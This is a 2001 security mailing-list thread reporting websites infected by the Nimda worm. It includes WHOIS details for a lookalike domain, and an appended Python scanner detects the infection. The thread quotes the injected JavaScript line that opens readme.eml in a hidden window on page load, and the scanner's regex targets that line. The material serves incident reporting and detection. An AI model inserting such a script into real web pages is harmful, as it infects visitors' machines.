Security Incidents mailing list archives

RE: Web site infected by Nimda


From: "Ken Pfeil" <Ken () infosec101 org>
Date: Wed, 19 Sep 2001 13:44:31 -0400

I'm sure there's thousands of sites affected. No need to list em all here.
As an FYI, wininternals.com is NOT related to Winternals Software. It is
registered to:

Registrant:
 Konstantinos Iatropoulos
 3400 Ovila Hamel
 St. Hubert, Quebec j3y 8p4
 ca

 Domain Name: WININTERNALS.COM

 Administrative Contact:
    Iatropoulos, Konstantinos  costa.sylvia.iatropoulos () sympatico ca
    3400 Ovila Hamel
    St. Hubert, Quebec j3y 8p4
    ca
    450 4624930

 Technical Contact:
    Nameback, Hostmaster  dns () nameback com
    1001 N. Lake Destiny Road
    Suite 125
    Maitland, FL 32751
    US
    (407) 475-1130

 Billing Contact:
    Billing, Nameback  billing () nameback com
    1001 N. Lake Destiny Rd. Suite 125
    Maitland, Florida 32751
    US
    407-475-1130


 Record last updated on 18-Sep-2001.
 Record expires on 14-Jun-2002.
 Record Created on 14-Jun-2000.

 Domain servers in listed order:
    NS1.INFOBACK.NET   207.30.43.2
    NS2.INFOBACK.COM   207.30.43.3

-----Original Message-----
From: Jac Engel [mailto:jacengel () home nl]
Sent: Wednesday, September 19, 2001 1:07 PM
To: acz [iSecureLabs]; incidents () securityfocus com
Subject: RE: Web site infected by Nimda


http://www.wininternals.com is also infected by Nimda Virus,
after the page is loaded I get a new page saying:
You have encountered the following error while using Windows Media Player:
--------------------------------------------------------------------------------
Error#  8007000D
Sorry, no more help is available for this problem at this time.

Jac

-----Original Message-----
From: acz [iSecureLabs] [mailto:aurelien.cabezon () iSecureLabs com]
Sent: Sunday, September 19, 1999 5:46 PM
To: incidents () securityfocus com
Subject: Web site infected by Nimda


Hi all,

http://www.digimind.fr/ is infected by Nimda virus!

This line was added at the end of the index.html

---<cut>---
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
---<cut>---

If you wanna visit digimind.fr, turn your web browser JavaScript off!

---
Cabezon Aurelien
http://www.iSecureLabs.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
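
One way to sweep a web root for the appended line quoted in the thread above, as an added example that is not part of the original messages. The suffix list and the check for a `readme.eml` beside the page are assumptions drawn from the relative URL in the quoted script, and the sample files are constructed.

```python
import re
import tempfile
from pathlib import Path

# Matches the quoted line, tolerating whitespace, quote style and case.
INJECTION = re.compile(r"""window\.open\(\s*["']readme\.eml["']""", re.IGNORECASE)
CLOSING_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
WEB_SUFFIXES = {".html", ".htm", ".asp"}  # assumption: served page types to check


def inspect_page(text):
    """Return None if clean, else a dict describing the injected script."""
    match = INJECTION.search(text)
    if match is None:
        return None
    line_no = text.count("\n", 0, match.start()) + 1
    # The post says the line was added at the end of index.html, after </html>.
    first_close = CLOSING_HTML.search(text)
    appended = first_close is not None and first_close.end() <= match.start()
    return {"line": line_no, "appended_after_html_close": appended}


def scan_webroot(root):
    """Walk a web root and report pages carrying the injected script."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_SUFFIXES:
            continue
        result = inspect_page(path.read_text(encoding="latin-1"))
        if result:
            result["path"] = str(path.relative_to(root))
            result["eml_present"] = (path.parent / "readme.eml").exists()
            findings.append(result)
    return findings


def demo():
    """Build a constructed web root (one clean page, one tampered) and scan it."""
    injected = ('<html><script language="JavaScript">window.open("readme.eml", null,\n'
                '"resizable=no,top=6000,left=6000")</script></html>\n')
    with tempfile.TemporaryDirectory() as root:
        Path(root, "about.html").write_text("<html><body>About</body></html>\n")
        Path(root, "index.html").write_text("<html><body>Home</body></html>\n" + injected)
        Path(root, "readme.eml").write_text("constructed placeholder, not a real sample\n")
        return scan_webroot(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A hit with `appended_after_html_close` set means the script sits after the page's own closing tag, which is where the post reports it was added.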

